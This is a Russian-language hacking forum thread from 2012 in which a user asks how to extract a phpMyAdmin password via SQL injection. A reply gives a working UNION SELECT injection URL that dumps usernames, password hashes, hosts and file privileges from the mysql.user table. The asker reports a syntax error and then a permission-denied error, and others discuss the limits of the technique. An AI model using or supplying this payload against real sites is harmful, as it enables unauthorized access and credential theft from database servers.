Как узнать пароль от phpmyadmin через sql инъекцию?

Discussion in 'Болталка' started by romagaisin, 22 Jan 2012.

  1. romagaisin

    romagaisin New Member

    Joined:
    7 Jun 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Слышал, что есть методы, может кто подскажет?
     
  2. Ereee

    Ereee Elder - Старейшина

    Joined:
    1 Dec 2011
    Messages:
    560
    Likes Received:
    370
    Reputations:
    267
    Code:
    http://site.ltd/vuln_script.php?vul_param=-1+union+select+1,concat_ws(0x3a,User,Password,Host,File_priv),3+from+mysql.user--+f
     
  3. [none]

    [none] Banned

    Joined:
    22 Nov 2009
    Messages:
    83
    Likes Received:
    26
    Reputations:
    -6
    это просто слухи
     
  4. romagaisin

    romagaisin New Member

    Joined:
    7 Jun 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    SELECT * FROM news WHERE namenews = 'trolol' union+select+1,concat_ws(0x3a,User,Password,Host ,File_priv),3+from+mysql.user--+f'
    вот такой запрос получается, выводит мускл еррор 1064
     
  5. romagaisin

    romagaisin New Member

    Joined:
    7 Jun 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    Запрос до ума довёл, вывело The Error returned was:
    SELECT command denied to user 'trolol'@'localhost' for table 'user'
     
  6. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    ты не настолько крут чтобы через скуль вытянуть пароль от pma. mysql не даёт заглянуть себе под юбку, пользователю из под которого идёт коннект к базе.
     
    #6 Чакэ, 22 Jan 2012
    Last edited: 23 Jan 2012
  7. romagaisin

    romagaisin New Member

    Joined:
    7 Jun 2011
    Messages:
    20
    Likes Received:
    1
    Reputations:
    0
    не есть хорошо, я так понимаю других способов нет?
     
  8. Ev!lCode

    Ev!lCode Banned

    Joined:
    5 Jan 2012
    Messages:
    2
    Likes Received:
    1
    Reputations:
    0
    Врятле, максимум хеш и то максимум!
     
  9. CTO

    CTO Member

    Joined:
    9 Sep 2011
    Messages:
    75
    Likes Received:
    6
    Reputations:
    0
    Я в этом деле не проф , но возможно тебе надо смотреть в сторону .штакесс на данном ИП адресе .
     
  10. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    где вы такие берётесь, посоны?
     
  11. _Def

    _Def New Member

    Joined:
    14 Jan 2012
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    Все возможно.
    Юзай хавий.
     
  12. Чакэ

    Чакэ Elder - Старейшина

    Joined:
    15 Aug 2010
    Messages:
    260
    Likes Received:
    66
    Reputations:
    62
    ещё один..
     
Loading...